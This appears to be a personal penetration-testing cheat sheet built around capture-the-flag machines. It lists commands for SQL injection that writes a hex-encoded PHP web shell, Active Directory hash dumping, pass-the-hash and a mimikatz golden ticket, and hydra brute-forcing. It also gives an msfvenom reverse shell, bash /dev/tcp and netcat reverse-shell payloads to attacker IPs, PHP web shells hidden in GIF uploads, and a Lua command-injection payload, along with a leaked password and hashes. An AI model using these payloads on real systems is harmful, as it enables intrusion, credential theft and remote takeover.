PENETRATION TESTING NOTES

1. pass the hash - allow to authenticate as user without password
2. https://www.safetydetectives.com/is-website-secure/?url=http%3A%2F%2F167.99.72.221 -check vulneravility

WINDOWS CMD TIPS & TRICKS

1. find equivalent - dir \s c:\file.txt
2. findstr /R "something" . - extract string in file

FIND COMMANDS

Find files:

find / -name Kernel.php 2>/dev/null

Find SUID files:

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.

find / -writable -type d 2>/dev/null      # world-writeable folders
find / -perm -222 -type d 2>/dev/null     # world-writeable folders
find / -perm -o w -type d 2>/dev/null     # world-writeable folders

find / -perm -o x -type d 2>/dev/null     # world-executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null   # world-writeable & executable folders
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files

find / -name perl*
find / -name python*
find / -name gcc*
find / -name c

SHELL

cat file.txt | grep -v 'Size: 157' (do not show anything that has "Size: 157" in it)
# Fix terminal:
stty size 
stty rows <value> cols <value>

MYSQLI INJECTION

1. 'union select 1, @@version-- - - to know version of sqli server
2. 'union select 1, table_name FROM information_schema.tables-- - - enumerate tables
3. UNION SELECT 1, LOAD_FILE('/etc/passwd')-- - - load files in the server
4. UNION SELECT 1, 0x3C3F7068702073797374656D28245F524551554553545B27636D64275D293B203F3E INTO OUTFILE '/var/www/html/plsgod.php'-- - - sqli exfil bypass with hexadecimal

UNION SELECT char(60,104,116,109,108,62,60,98,111,100,121,62,60,112,62,72,105,32,105,116,32,119,111,114,107,115,33,60,47,112,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62), null INTO OUTFILE '/var/www/html/test.html'-- -

• sqli exfil bypass with char() function

RELATED LINKS

1. https://www.websec.ca/kb/sql_injection

ACTIVE DIRECTORY [AD]

1. enum4linux - to enumerate port 139/445 [AD]
2. nbtscan - enumerate NETBIOS shares [AD]
3. ./kerbrute_linux_amd64 userenum -v -d spookysec.local --dc 10.10.21.202 users.txt | grep VALID - kerbrute exploit kerberos ASREP [AD]
4. impacket - use to get hashes and more [AD]
5. python3 /opt/impacket/examples/GetNPUsers.py spookysec.local/ -no-pass -usersfile validusers.txt -format hashcat - no-pass(passthehash) enumerate [AD]
6. python3 /opt/impacket/examples/secretsdump.py -just-dc-ntlm/-just-dc 10.10.201.139/backup@10.10.201.139 - dump hash in DC [AD]
7. ruby /opt/evil-winrm/evil-winrm.rb -i 10.10.36.142 -u USER -H 0e0363213e37b94221497260b0bcb4fc - pass the hash [AD]

WINDOWS POST-EXPLOITATION

POWERVIEW

1. powershell -ep bypass - bypass the execution policy to run scripts [WPE]
2. . .\PowerView.ps1 - start the powerview script [WPE]
3. Get-NetUser | select cn - powerview enumerate domain users [WPE]
4. Get-NetGroup -GroupName *admin* - powerview enumerate domain groups [WPE]
5. Invoke-ShareFinder - powerview enumerate shared folder [WPE]
6. Get-NetComputer -fulldata | select operatingsystem - powerview enumerate operatingsystem [WPE]

BLOODHOUND (active directory mapping)

1. powershell -ep bypass - bypassing execution policy
2. . .\SharpHound.ps1
3. Invoke-BloodHound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip - save mapping of the active directory [WPE]

MIMIKATZ

1. privilege::debug - check that mimikats run as administrator
2. lsadump::lsa /patch - dump all hashes
3. lsapdump::lsa /inject /name:krbtgt - dump hash and security identifier to create golden ticket

mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 5508500012cc005cf7082a9a89ebdfdf
    LM   :
  Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
    ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
    ntlm- 0: 372f405db05d3cafd27f8e6a4a097b2c

4. kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500 - create golden ticket (id is default admin groupid)
5. misc::cmd - spawn new shell with elevated privileges
6. dir \\Desktop-1\c$ - access to another computer in the domain (pivot)

SUID ENUMERATIONS

1. find / -perm -u=s -type f 2>/dev/null - [SUID]

SAMBA ENUMERATIONS

1. nmap -p445 --script-enum-shares.nse,smb-enum-users.nse $IP - enumerates samba shares
2. nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP - enumerates mount
3. smbget -R smb://$IP/ - to get recursively in the shares
4. showmount $IP - to show available mount in server
5. smbclient \\\\10.10.201.139\\backup -U svc-user - to enter the shares
6. smbclient -L 10.10.201.139 -U svc-user - to list shares
7. smbmap

GIT ENUMERATIONS

HASHES

1. Aministrator:500:aaa3b435b51404eeaac3b435b51404ee:0e0363213e37b94221497260b0bcb4fc::: - NTLM hash
2. hashcat -m 1710 -a 0 hash:salt /usr/share/wordlists/rockyou.txt - cracking hash with salt

ZIP FILE CRACKING

1. 7zipcrack - to crack password of 7zip file
2. fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt Found.zip - crack password of 7zip file
3. 7z - open 7zip file
4. fcrackzip -B - run a benchmark
5. fcrackzip -v -m zip6 -l 4-8 -u secret.zip - crack zip file with password length 4-8 charakters

BINARY EXPLOITATION

1. hexeditor - to view binary format and hex format

FORENSICS [FRS]

1. search for wanted strings [FRS]
2. we can look onto http stream and then downlod all the activity by exporting into HTTP objects [FRS]
3. sudo tcpdump -s 0 -i tun0 -w tcpdump.pcap - to capture traffic [FRS]
4. tshark -r overpass2.pcapng -T fields -e ip.dst | sort | uniq -c - display ip with most packets [FRS]
5. tshark -r overpass2.pcapng ip.dst==192.168.170.159 | head - filter by ip [FRS]
6. tshark -r overpass2.pcapng --export-objects "http,http-objects"] - export HTTP objects [FRS]

CRYPTOGRAPHY

1. https://scwf.dima.ninja/

STEGANOGRAPHY

1. stegsolve - image stenography solver
2. steghide (extract) : steghide extract -sf <filename> (hit enter on passphrase)

PROFTPD

1. SITE CPFR $FILE - copy targeted file into buffer
2. SITE CPTO $DESTINATIONPWD - mv copied file into destination directory

MSFVENOM

1. msfvenom -p windows/shell_reverse_tcp LHOST=10.66.67.22 LPORT=9000 -f exe -o shell.exe

SMTP

1. python2 imapgrab.py -l -s sneakycorp.htb -u username-p 'password' - login to email server [SMTP]
2. python2 imapgrab.py -d -v -M -f ~/Documents/ctf/htb/sneakymailer/backup -s sneakycorp.htb -u paulbyrd -p '^(#J@SkFv2[%KhIxKk(JuhqcHl<:Ht' -m 'ALL'` - download mails
3. evolution - open email with evolution app

SMTP COMMANDS

• • a LIST "" "*"
• • a LIST "" “INBOX/*”
• • a STATUS INBOX RECENT
• • a select inbox

HELO my.server.com
MAIL FROM: 
RCPT TO: 
DATA
From: Danny Dolittle 
To: Sarah Smith 
Subject: Email sample
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii

This is a test email for you to read.
.
QUIT

FTP

1. we can upload file using tftp

SUBDOMAIN ENUMERATIONS / FUZZING

WFUZZ

1. wfuzz -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://sneakycorp.htb -H 'Host: FUZZ.sneakycorp.htb' --hc 301
2. ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://sneakycorp.htb -H "Host:FUZZ.sneakycorp.htb"
3. wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.1.202/FUZZ
4. wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ - look for common directories
5. wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ.php - for common files
6. wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ - fuzzing parameters in url
7. wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://minion.htb/userinfo.php - fuzzing post requests
8. wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://minion.htb/FUZZ - fuzzing cookies
9. wfuzz -z file,wordlist/general/common.txt -b cookie=FUZZ http://minion.htb/ - fuzzing cookies 2
10. wfuzz -z file,wordlist/general/common.txt -H "myheader: headervalue" -H "myheader2: headervalue2" http://minion.htb/FUZZ - fuzzing custom headers
11. wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://minion.htb/ - fuzzing http verbs
12. wfuzz -z file,wordlist/general/common.txt -p localhost:8080 http://minion.htb/FUZZ - using proxys
13. wfuzz -z file,wordlist/general/common.txt -p localhost:2222:SOCKS5 http://minion.htb/FUZZ - using socks proxys

SCRIPTS

1. while read email; do swaks --to $email --from security@htb --body "goto http://10.10.14.69" --server sneakycorp.htb;done < email.txt

BLUETOOTH HACKING

use hcitool scan

l2ping -i hci0 -s 600 -f 39:8C:14:6B:53:2D

//get a shell from webapp or web shell cd /var/tmp && echo '#!/bin/bash' >> test.sh && echo 'bash -i >& /dev/tcp/192.168.60.128/444 0>&1' >> test.sh && chmod 777 test.sh && ./test.sh <?php $cmd=$_GET['cmd']; print('$cmd'); ?> -- > get shells from uploaded image

REMOTE CODE EXECUTION (RCE)

<?php echo system($_GET['cmd']); ?>
<?php $_GET['param1']($_GET['param2']); ?>

echo "bash -i >& /dev/tcp/10.10.14.17/1234 0>&1" | base64

Inject code to image or gif:

echo '<?php $cmd=$_GET["cmd"]; echo `$cmd`; ?>' >> bad.gif then upload
convert -delay 20 -loop 0 *.jpg example.gif --> convert imge to gif

http://192.168.0.10/imfadministrator/uploads/ad54eabb6fde.gif?cmd=ls -->> ?cmd=ls to use the cmd commands

LOCAL FILE INCLUSIONS (LFI)

php://filter/convert.base64-encode/resource=config http://172.20.10.3/?page=php://filter/convert.base64-encode/resource=config

WEBISTE/PAGE VULNERABILITY

check for LFI vulnerabilities due to the ?page=<input> structure. can use tool kadimus (https://github.com/P0cL4bs/Kadimus) usage: ./kadimus -u 192.168.246.105/?page=login ---> must be run in the directory. 3rd party tool always in opt

strings filename.jpg{png,bmp,jpg} # Stego

cewl : cewl $ip -w cewl.txt

HYDRA

hydra http

hydra -l <username> -P <wordlist> <IP> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid Password"

hydra smtp attack

hydra -s 25 -v -V -l test@example.com -P /path/to/password/list.lst -t 1 -w 20 -f 192.168.10.5 smtp

hydra ssh attack

hydra -L users.txt -P passwords.txt ssh://10.10.10.7 
hydra <ip address> ssh -vV -L <login list> -P <password list> -e s -t 10

SQLMAP

sqlmap: When running burp, copy the login or whatever request entirely, paste it to a file and save it as login.req //IMPORTANT sqlmap -r login.req sqlmap -u http://192.168.246.105/?page=login –data=”user=user&pass=pass&submit=Login” -puser –dbms mysql –risk=3 –level=3 sqlmap -r capture.txt --dbs --threads 10 --level 5 --risk 3 sqlmap --level 5 --risk 3 --url "http://172.20.10.3/?page=add_value*" sqlmap -D database --tables --url sqlmap --dbs -- tables --url sqlmap --tables -D databasename --url sqlmap --columns -D databasename -T tablename --url

SSH

SSH login with id_rsa:

ssh -i id_rsa username@ip

Send email with telnet over port 25

telnet ip 25
EHLO or HELO druckkammer.machine.htb <--- the domain does not matter just put something there
VRFY username@localhost <-- optional
mail from:<gillbates@microsucks.com>
rcpt to:<username@localhost>
data
Subject: YOU GOT OWNED <-- example 
MESSAGE OR SHELL CODE HERE!

LUA RCE

1. /weather/forecast?city=London')%3bos.execute("rm++/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.69+9001+>/tmp/f")-- - unsanitized input lead to lua execution

GPG ENCRYPT / DECRYPT

1. netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output /tmp/idk.gz - decrypt gpg encryption